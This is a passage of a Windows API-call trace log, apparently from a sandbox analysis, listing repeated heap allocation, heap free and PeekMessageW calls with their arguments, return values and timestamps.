HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.589] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0122.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0122.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0122.589] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0122.589] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0122.590] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0122.590] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0122.591] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.591] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.591] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.591] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.591] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.592] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0f0 | out: hHeap=0x12c0000) returned 1 [0122.592] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0122.592] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0122.592] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.593] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0122.593] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.593] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0122.593] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.593] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0122.593] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0122.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.594] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0122.594] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.594] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0122.594] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.595] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0122.595] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0122.595] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.595] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0122.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefb0 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0122.596] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.596] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.596] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0122.596] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0122.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919f8 | out: hHeap=0x12c0000) returned 1 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.597] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0122.598] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0122.598] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0122.598] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0122.599] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.599] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0122.599] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0122.599] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0122.600] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.600] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0122.600] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0122.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.601] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0122.601] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.601] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0122.601] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0122.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.602] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0122.602] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919f8 | out: hHeap=0x12c0000) returned 1 [0122.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0122.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.602] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0122.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0122.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.603] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 